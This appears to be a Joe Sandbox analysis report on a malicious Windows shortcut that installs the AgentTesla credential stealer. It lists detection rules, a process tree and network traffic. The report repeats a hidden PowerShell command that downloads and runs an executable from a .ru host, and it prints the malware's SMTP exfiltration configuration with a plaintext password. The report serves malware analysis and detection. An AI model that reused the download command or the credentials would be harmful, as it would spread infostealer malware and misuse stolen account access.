Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RTGS-WB-ABS-240730-NEW.lnk

Overview

General Information

Sample name:RTGS-WB-ABS-240730-NEW.lnk
Analysis ID:1520403
MD5:82937aae96fa6a40b59703eea97ce1ef
SHA1:d23b17711e2e65609c9973d6f03dde3d2acb3568
SHA256:d820d9f270915fc81bedefd16bf7b8a20cb88a4d1e55d8566b9367fa494ac356
Tags:lnkuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AgentTesla
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 1824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 5956 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: AA6F514A7AFA81E26BCF612923EA483C)
      • recomplaint.exe (PID: 5692 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: AA6F514A7AFA81E26BCF612923EA483C)
        • RegSvcs.exe (PID: 4412 cmdline: "C:\Users\user\AppData\Local\Temp\file.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 4872 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • recomplaint.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\unspattered\recomplaint.exe" MD5: AA6F514A7AFA81E26BCF612923EA483C)
      • RegSvcs.exe (PID: 5768 cmdline: "C:\Users\user\AppData\Local\unspattered\recomplaint.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • aWUFv.exe (PID: 3884 cmdline: "C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • aWUFv.exe (PID: 2120 cmdline: "C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "techniqueqatar.com", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    8.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x36d36:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x36da8:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x36e32:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x36ec4:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x36f2e:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x36fa0:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x37036:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x370c6:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Invoke-WebRequest Execution
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , ProcessId: 4872, ProcessName: wscript.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 4412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aWUFv
                    Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\file.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , ParentImage: C:\Users\user\AppData\Local\unspattered\recomplaint.exe, ParentProcessId: 5692, ParentProcessName: recomplaint.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\file.exe" , ProcessId: 4412, ProcessName: RegSvcs.exe
                    Sigma detected: PowerShell Web Download
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.176, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 4412, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 61255
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs" , ProcessId: 4872, ProcessName: wscript.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }", ProcessId: 1824, ProcessName: powershell.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\unspattered\recomplaint.exe, ProcessId: 5692, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-27T10:38:56.228125+020020301711A Network Trojan was detected192.168.2.660913208.91.198.176587TCP
                    2024-09-27T10:39:33.684199+020020301711A Network Trojan was detected192.168.2.661255208.91.198.176587TCP
                    2024-09-27T10:39:47.577844+020020301711A Network Trojan was detected192.168.2.660905208.91.198.176587TCP
                    2024-09-27T10:39:50.515013+020020301711A Network Trojan was detected192.168.2.660912208.91.198.176587TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 8.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "techniqueqatar.com", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$"}
                    Multi AV Scanner detection for submitted file
                    Source: RTGS-WB-ABS-240730-NEW.lnkReversingLabs: Detection: 23%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\file.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeJoe Sandbox ML: detected
                    Source: unknownHTTPS traffic detected: 176.99.3.36:443 -> 192.168.2.6:61245 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:61253 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:60910 version: TLS 1.2
                    Source: Binary string: RegSvcs.pdb, source: aWUFv.exe, 0000000D.00000000.2622184453.0000000000502000.00000002.00000001.01000000.00000009.sdmp, aWUFv.exe.8.dr
                    Source: Binary string: wntdll.pdbUGP source: recomplaint.exe, 00000007.00000003.2386568009.0000000004530000.00000004.00001000.00020000.00000000.sdmp, recomplaint.exe, 00000007.00000003.2387078782.00000000046D0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: recomplaint.exe, 00000007.00000003.2386568009.0000000004530000.00000004.00001000.00020000.00000000.sdmp, recomplaint.exe, 00000007.00000003.2387078782.00000000046D0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: RegSvcs.pdb source: aWUFv.exe, 0000000D.00000000.2622184453.0000000000502000.00000002.00000001.01000000.00000009.sdmp, aWUFv.exe.8.dr

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:61255 -> 208.91.198.176:587
                    Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:60905 -> 208.91.198.176:587
                    Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:60912 -> 208.91.198.176:587
                    Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:60913 -> 208.91.198.176:587
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:61255 -> 208.91.198.176:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.6:61255 -> 208.91.198.176:587
                    Source: global trafficHTTP traffic detected: GET /components/grace.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: oootorgline.ruConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /components/grace.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: oootorgline.ruConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: oootorgline.ru
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: techniqueqatar.com
                    Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                    Source: RegSvcs.exe, 0000000C.00000002.3381286822.0000000005C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: RegSvcs.exe, 00000008.00000002.2567429663.0000000003401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.0000000003401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000000.00000002.2287618621.00000221376BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000000.00000002.2262113733.0000022128C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oootorgline.ru
                    Source: powershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000000.00000002.2262113733.0000022127651000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000034CB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002A17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://techniqueqatar.com
                    Source: powershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000000.00000002.2296430995.000002213F920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: powershell.exe, 00000000.00000002.2262113733.0000022127651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
